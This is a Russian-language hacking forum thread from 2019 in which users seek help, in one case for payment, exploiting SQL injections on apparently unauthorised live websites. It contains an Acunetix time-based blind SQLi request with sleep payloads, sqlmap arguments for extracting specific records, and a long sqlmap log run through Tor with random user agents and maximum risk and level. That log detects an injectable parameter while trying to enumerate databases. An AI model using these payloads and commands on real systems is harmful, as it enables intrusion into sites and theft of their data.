ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
14.09.2019, 01:46
|
|
Познающий
Регистрация: 30.08.2016
Сообщений: 34
Провел на форуме:
12641
Репутация:
0
|
|
да к сожалению не работает( но все равно спасибо
|
|
|
14.09.2019, 13:00
|
|
Новичок
Регистрация: 14.09.2019
Сообщений: 3
Провел на форуме:
1006
Репутация:
0
|
|
Всем привет,помогите пожалуйста ситуация такая:
Appspider(Rapid7) находит sql уязвимость "Double-float overflow" отправляя значение "1e309" как данные POST запросом,в ответе Mysql2::Error: Unknown column 'Infinity' in 'field list': INSERT INTO `interactions` (`accept_langs`, `browser`, `browser_version`....перечисление всех колонок) при ЛЮБЫХ других значениях кроме "1e309(и выше 1e310..)" ошибки НЕТ,sqlmap не может раскрутить ее,пробовал фазерам через owasp большим списком также ошибок других не нашлось реакция только на 1e309.
И из всего этого вопрос как ее раскрутить в sqlmap?готов оплатить за помощь если кто знает как решить,моя телега @S920799
|
|
|
|
14.09.2019, 13:10
|
|
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
Провел на форуме:
96779
Репутация:
5
|
|
Сообщение от Baskin-Robbins
↑
--where=email LIKE '%@site.com'
но не уверен, сейчас проверил на sqlmap - не хочет работать, хотя вручную все работает
Сообщение от Estet
↑
да к сожалению не работает( но все равно спасибо
--where="email=' admin@admin.com'" так будет работать
|
|
|
|
14.09.2019, 17:47
|
|
Участник форума
Регистрация: 25.04.2013
Сообщений: 153
Провел на форуме:
56255
Репутация:
2
|
|
[QUOTE="ex3x1"]
↑
Приветствую! Acunetix'ом обнаружена Blind SQLinj:
Код:
GET /rent.php?country=179&method=get_mobile_count&operator=4&services=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(select(0)from(select(sleep(0)))v)%2B"*/&timereset=2 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://site.org/
Cookie: PHPSESSID=c2907islgb685fdbo0u6h5im40
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: site.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Далее лог SQLmap'а:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]sqlmap[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]py[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]u[/COLOR][COLOR="#DD0000"]"http://site.org/rent.php?country=179&method=get_mobile
_count&operator=4&services=33*&timereset=2"[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]random[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]agent[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]tor[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]tor[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]type[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]SOCKS5[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]risk[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]level[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]dbs
___
__H__
___ ___[/COLOR][COLOR="#007700"][.][/COLOR][COLOR="#0000BB"]_____ ___ ___[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]1.3.9.9[/COLOR][COLOR="#FF8000"]#dev}
[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]-| . [.] | .[/COLOR][COLOR="#DD0000"]'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user'[/COLOR][COLOR="#0000BB"]s responsibility to
obey all applicable local[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]state[/COLOR][COLOR="#007700"]and[/COLOR][COLOR="#0000BB"]federal laws[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]Developers assume no liability[/COLOR][COLOR="#007700"]and[/COLOR][COLOR="#0000BB"]are not responsible[/COLOR][COLOR="#007700"]for[/COLOR][COLOR="#0000BB"]any misuse[/COLOR][COLOR="#007700"]or[/COLOR][COLOR="#0000BB"]damage caused by
this program
[/COLOR][COLOR="#007700"][*][/COLOR][COLOR="#0000BB"]starting[/COLOR][COLOR="#007700"]@[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]57[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]35[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]2019[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]09[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]14[/COLOR][COLOR="#007700"]/
[[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]57[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]35[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]WARNING[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]increasing[/COLOR][COLOR="#007700"]default[/COLOR][COLOR="#0000BB"]value[/COLOR][COLOR="#007700"]for[/COLOR][COLOR="#0000BB"]option[/COLOR][COLOR="#DD0000"]'--time-sec'[/COLOR][COLOR="#0000BB"]to 10 because[/COLOR][COLOR="#007700"]switch[/COLOR][COLOR="#DD0000"]'--tor'[/COLOR][COLOR="#0000BB"]was provided
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]57[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]35[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]setting Tor SOCKS proxy settings
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]57[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]36[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]fetched random HTTP User[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Agent header value[/COLOR][COLOR="#DD0000"]'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.11 (KHTML, lik
e Gecko) Chrome/17.0.963.66 Safari/535.11'[/COLOR][COLOR="#0000BB"]from file[/COLOR][COLOR="#DD0000"]'user-agents.txt'
[/COLOR][COLOR="#0000BB"]custom injection marker[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'*'[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]found in option[/COLOR][COLOR="#DD0000"]'-u'[/COLOR][COLOR="#007700"]. Do[/COLOR][COLOR="#0000BB"]you want to process it[/COLOR][COLOR="#007700"]? [[/COLOR][COLOR="#0000BB"]Y[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]n[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]q[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]y
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]57[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]38[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing connection to the target URL
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]57[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]39[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]checking[/COLOR][COLOR="#007700"]if[/COLOR][COLOR="#0000BB"]the target is[/COLOR][COLOR="#007700"]protected[/COLOR][COLOR="#0000BB"]by some kind of WAF[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]IPS
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]57[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]40[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#007700"]if[/COLOR][COLOR="#0000BB"]the target URL content is stable
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]57[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]40[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]target URL content is stable
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]57[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]40[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#007700"]if[/COLOR][COLOR="#0000BB"]URI parameter[/COLOR][COLOR="#DD0000"]'#1*'[/COLOR][COLOR="#0000BB"]is dynamic
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]57[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]41[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]URI parameter[/COLOR][COLOR="#DD0000"]'#1*'[/COLOR][COLOR="#0000BB"]appears to be dynamic
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]57[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]41[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]WARNING[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]heuristic[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]basic[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]test shows that URI parameter[/COLOR][COLOR="#DD0000"]'#1*'[/COLOR][COLOR="#0000BB"]might not be injectable
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]57[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]42[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#007700"]for[/COLOR][COLOR="#0000BB"]SQL injection on URI parameter[/COLOR][COLOR="#DD0000"]'#1*'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]57[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]42[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'AND boolean-based blind - WHERE or HAVING clause'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]57[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]50[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]URI parameter[/COLOR][COLOR="#DD0000"]'#1*'[/COLOR][COLOR="#0000BB"]appears to be[/COLOR][COLOR="#DD0000"]'AND boolean-based blind - WHERE or HAVING clause'[/COLOR][COLOR="#0000BB"]injectable
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]57[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]57[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]57[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]57[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]57[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]57[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]57[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]59[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]57[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]59[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]00[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]00[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]01[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]01[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]03[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]03[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]04[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]05[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'PostgreSQL AND error-based - WHERE or HAVING clause'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]05[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'PostgreSQL OR error-based - WHERE or HAVING clause'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]06[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]06[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]07[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]07[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONVERT)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]08[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]08[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]09[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]09[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Oracle OR error-based - WHERE or HAVING clause (XMLType)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]11[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]11[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Oracle OR error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Firebird AND error-based - WHERE or HAVING clause'
